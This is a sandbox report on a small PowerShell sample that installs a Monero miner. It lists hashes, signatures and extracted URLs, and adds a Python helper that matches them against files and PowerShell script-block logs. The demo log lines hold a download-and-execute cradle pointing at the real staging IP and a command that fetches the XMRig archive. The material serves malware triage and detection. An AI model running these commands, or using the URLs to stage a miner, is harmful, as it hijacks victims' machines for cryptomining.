General
Target: file01.ps1
Size: 148 B
Sample: 240705-g492bstenk
MD5: ccab7cc0213131da914474a10380dcc8
SHA1: 601d9886a23026652da753780d335125b9d41749
SHA256: 9af65b08db3c9f1a34d9951e746df61da38da630bbeee5f63f0191664b7cf768
SHA512: 2cf263e50f9674fde2239895d5ac9a08989e12f869030456a6bd67bd7a95be41f46f8506f7afde1b172d0b6174b0893ec2841c43020d3e1432eef1b038c5efff
Tasks
Static task: static1
Behavioral task: behavioral1 (sample file01.ps1, resource win10-20240404-en)
Behavioral task: behavioral2 (sample file01.ps1, resource win10v2004-20240704-en)
Malware Config
Extracted: http://185.254.97.190:2024/test.txt
Extracted: https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted: https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
The first URL is a bare IP on a non-standard port (2024) serving a .txt file, which is consistent with a 148-byte script whose job is to fetch a second stage. The other two point at the public MoneroOcean xmrig_setup repository on GitHub (the XMRig miner archive and NSSM, a service wrapper used to run it as a Windows service); that is the "legitimate hosting service" the signature list below refers to, so blocking raw.githubusercontent.com outright is rarely an option and detection has to key on the repository path or on the resulting miner/service activity.
Targets
Target: file01.ps1 (148 B; MD5, SHA1, SHA256 and SHA512 as listed under General above)
Signatures
- XMRig Miner payload
- Blocklisted process makes network request
- Executes dropped EXE
- Legitimate hosting services abused for malware hosting/C2
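As an added example (this is not part of the sandbox report and not the sample's own code): an offline triage helper in Python that takes the hashes and the extracted URLs above as indicators, checks a candidate file against them, and scans PowerShell script-block log lines for the URLs or, more loosely, for their hosts and repository path. The log lines are constructed for the demonstration and are not the content of the 148-byte sample; the path `some_other_file.txt` is hypothetical and only shows a host-level hit without an exact URL hit.

```python
import hashlib
import re

# Indicators copied from the sandbox report above.
REPORT_SIZE = 148
REPORT_HASHES = {
    "md5": "ccab7cc0213131da914474a10380dcc8",
    "sha1": "601d9886a23026652da753780d335125b9d41749",
    "sha256": "9af65b08db3c9f1a34d9951e746df61da38da630bbeee5f63f0191664b7cf768",
    "sha512": "2cf263e50f9674fde2239895d5ac9a08989e12f869030456a6bd67bd7a95be41f"
              "46f8506f7afde1b172d0b6174b0893ec2841c43020d3e1432eef1b038c5efff",
}
REPORT_URLS = {
    "http://185.254.97.190:2024/test.txt",
    "https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip",
    "https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip",
}
# Looser indicators derived from the URLs above: the staging IP on its own, and
# the GitHub repository path, so a script pulling a different file from the same
# places still hits. Blocking raw.githubusercontent.com wholesale is not practical.
REPORT_HOSTS = {"185.254.97.190", "raw.githubusercontent.com/MoneroOcean/xmrig_setup"}

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def hash_bytes(data: bytes) -> dict:
    """Return the four digests the report lists, as lowercase hex."""
    return {algo: hashlib.new(algo, data).hexdigest()
            for algo in ("md5", "sha1", "sha256", "sha512")}


def matches_report_hashes(data: bytes) -> dict:
    """Per-algorithm True/False against the report's hashes."""
    digests = hash_bytes(data)
    return {algo: digests[algo] == REPORT_HASHES[algo] for algo in REPORT_HASHES}


def match_iocs(text: str) -> dict:
    """Exact URL hits and host/repo-level hits found in a script body or log line."""
    found = set(URL_RE.findall(text))
    hosts = set()
    for url in found:
        no_scheme = url.split("://", 1)[1]
        host_only = no_scheme.split("/", 1)[0].split(":", 1)[0]
        for ioc in REPORT_HOSTS:
            if host_only == ioc or no_scheme.lower().startswith(ioc.lower() + "/"):
                hosts.add(ioc)
    return {"urls": found & REPORT_URLS, "hosts": hosts}


def scan_log(lines) -> list:
    """Return (line_number, indicator) for every log line with a hit, URLs first."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = match_iocs(line)
        hits.extend((n, url) for url in sorted(m["urls"]))
        hits.extend((n, host) for host in sorted(m["hosts"]))
    return hits


def triage_sample(data: bytes) -> dict:
    """Everything a quick offline check can say about a candidate file."""
    return {
        "size_matches": len(data) == REPORT_SIZE,
        "hash_matches": matches_report_hashes(data),
        "iocs": match_iocs(data.decode("utf-8", errors="replace")),
    }


# Constructed PowerShell script-block log lines (Event ID 4104 style) for the
# demo only; they are NOT the content of the 148-byte sample in the report.
CONSTRUCTED_LOG = [
    "4104 ScriptBlockText: iex (New-Object Net.WebClient).DownloadString('http://185.254.97.190:2024/test.txt')",
    "4104 ScriptBlockText: Get-ChildItem C:\\Users | Measure-Object",
    "4104 ScriptBlockText: Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip' -OutFile $env:TEMP\\x.zip",
    # Hypothetical path: no exact URL match, but the repository path still hits.
    "4104 ScriptBlockText: Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/some_other_file.txt'",
]

if __name__ == "__main__":
    for n, indicator in scan_log(CONSTRUCTED_LOG):
        print(f"line {n}: {indicator}")
    print(triage_sample(CONSTRUCTED_LOG[0].encode()))
```

To use it on a real artefact, feed the file bytes to `triage_sample` (a true `hash_matches` entry means the exact sample from the report) and pipe exported 4104 script-block text through `scan_log`; the host-level hits are the ones worth alerting on across variants, since the exact URLs will change as soon as the staging server or file names do.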